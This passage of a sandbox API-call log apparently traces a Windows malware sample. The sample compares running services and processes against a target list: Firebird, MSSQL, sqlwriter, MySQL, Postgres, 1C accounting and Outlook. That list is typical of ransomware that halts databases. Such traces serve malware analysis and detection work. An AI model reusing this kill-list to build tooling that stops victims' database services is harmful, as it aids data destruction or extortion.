lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0033.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0033.510] lstrlenW (lpString="DcomLaunch") returned 10 [0033.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0033.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0033.510] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0033.510] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0033.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0033.510] lstrlenW (lpString="Dhcp") returned 4 [0033.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0033.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0033.510] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0033.510] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0033.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0033.510] lstrlenW (lpString="Dnscache") returned 8 [0033.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0033.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0033.510] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0033.510] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0033.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0033.510] lstrlenW (lpString="DPS") returned 3 [0033.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0033.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0033.510] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0033.510] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0033.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0033.511] lstrlenW (lpString="eventlog") returned 8 [0033.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0033.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0033.511] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0033.511] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0033.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0033.511] lstrlenW (lpString="EventSystem") returned 11 [0033.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0033.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0033.511] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0033.511] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0033.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0033.511] lstrlenW (lpString="gpsvc") returned 5 [0033.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0033.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0033.511] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0033.511] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0033.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0033.511] lstrlenW (lpString="iphlpsvc") returned 8 [0033.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0033.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0033.511] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0033.511] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0033.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0033.511] lstrlenW (lpString="LanmanServer") returned 12 [0033.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0033.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0033.511] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0033.511] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0033.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0033.511] lstrlenW (lpString="LanmanWorkstation") returned 17 [0033.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0033.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0033.511] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0033.511] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0033.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0033.512] lstrlenW (lpString="lmhosts") returned 7 [0033.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0033.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0033.512] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0033.512] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0033.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0033.512] lstrlenW (lpString="MMCSS") returned 5 [0033.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0033.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0033.512] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0033.512] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0033.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0033.512] lstrlenW (lpString="MpsSvc") returned 6 [0033.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0033.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0033.512] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0033.512] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0033.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0033.512] lstrlenW (lpString="Netman") returned 6 [0033.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0033.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0033.512] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0033.512] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0033.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0033.512] lstrlenW (lpString="netprofm") returned 8 [0033.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0033.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0033.512] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0033.512] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0033.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0033.512] lstrlenW (lpString="NlaSvc") returned 6 [0033.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0033.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0033.512] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0033.512] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0033.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0033.512] lstrlenW (lpString="nsi") returned 3 [0033.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0033.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0033.513] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0033.513] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0033.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0033.513] lstrlenW (lpString="PcaSvc") returned 6 [0033.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0033.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0033.513] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0033.513] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0033.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0033.513] lstrlenW (lpString="PlugPlay") returned 8 [0033.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0033.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0033.513] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0033.513] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0033.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0033.513] lstrlenW (lpString="Power") returned 5 [0033.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0033.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0033.513] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0033.513] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0033.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0033.513] lstrlenW (lpString="ProfSvc") returned 7 [0033.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0033.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0033.513] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0033.513] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0033.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0033.513] lstrlenW (lpString="RpcEptMapper") returned 12 [0033.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0033.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0033.513] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0033.513] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0033.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0033.513] lstrlenW (lpString="RpcSs") returned 5 [0033.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0033.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0033.514] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0033.514] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0033.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0033.514] lstrlenW (lpString="SamSs") returned 5 [0033.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0033.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0033.514] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0033.514] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0033.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0033.514] lstrlenW (lpString="Schedule") returned 8 [0033.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0033.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0033.514] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0033.514] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0033.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0033.514] lstrlenW (lpString="SENS") returned 4 [0033.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0033.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0033.514] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0033.514] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0033.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0033.514] lstrlenW (lpString="ShellHWDetection") returned 16 [0033.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0033.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0033.514] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0033.514] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0033.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0033.514] lstrlenW (lpString="Spooler") returned 7 [0033.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0033.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0033.514] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0033.514] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0033.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0033.514] lstrlenW (lpString="SysMain") returned 7 [0033.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0033.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0033.514] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0033.515] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0033.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0033.515] lstrlenW (lpString="Themes") returned 6 [0033.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0033.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0033.515] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0033.515] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0033.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0033.515] lstrlenW (lpString="TrkWks") returned 6 [0033.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0033.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0033.515] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0033.515] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0033.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0033.515] lstrlenW (lpString="UxSms") returned 5 [0033.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0033.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0033.515] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0033.515] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0033.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0033.515] lstrlenW (lpString="WdiServiceHost") returned 14 [0033.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0033.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0033.515] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0033.515] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0033.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0033.515] lstrlenW (lpString="WdiSystemHost") returned 13 [0033.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0033.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0033.515] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0033.515] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0033.515] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0033.515] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0033.515] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0033.515] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0033.515] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0033.515] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0033.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0033.516] lstrlenW (lpString="Winmgmt") returned 7 [0033.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0033.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0033.516] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0033.516] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0033.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0033.516] lstrlenW (lpString="WPDBusEnum") returned 10 [0033.516] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0033.516] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0033.516] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0033.516] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0033.516] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0033.516] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x639360 | out: hHeap=0x600000) returned 1 [0033.516] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0033.519] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0033.519] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0033.520] lstrlenW (lpString="System") returned 6 [0033.520] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0033.520] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0033.520] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0033.520] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0033.520] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0033.520] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0033.520] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0033.520] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0033.521] lstrlenW (lpString="smss.exe") returned 8 [0033.521] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0033.521] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0033.521] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0033.521] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0033.521] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0033.521] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0033.521] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0033.521] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0033.521] lstrlenW (lpString="csrss.exe") returned 9 [0033.521] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0033.521] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0033.521] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0033.521] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0033.521] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0033.521] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0033.522] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0033.522] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0033.522] lstrlenW (lpString="wininit.exe") returned 11 [0033.522] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0033.522] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0033.522] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0033.522] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0033.522] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0033.522] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0033.522] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0033.522] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0033.523] lstrlenW (lpString="csrss.exe") returned 9 [0033.523] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0033.523] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0033.523] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0033.523] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0033.523] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0033.523] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0033.523] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0033.524] lstrlenW (lpString="winlogon.exe") returned 12 [0033.524] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0033.524] lstrlenW (lpString="services.exe") returned 12 [0033.524] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0033.525] lstrlenW (lpString="lsass.exe") returned 9 [0033.525] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0033.525] lstrlenW (lpString="lsm.exe") returned 7 [0033.525] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.526] lstrlenW (lpString="svchost.exe") returned 11 [0033.526] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.527] lstrlenW (lpString="svchost.exe") returned 11 [0033.527] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.527] lstrlenW (lpString="svchost.exe") returned 11 [0033.527] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.528] lstrlenW (lpString="svchost.exe") returned 11 [0033.528] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.528] lstrlenW (lpString="svchost.exe") returned 11 [0033.528] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0033.529] lstrlenW (lpString="audiodg.exe") returned 11 [0033.529] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, 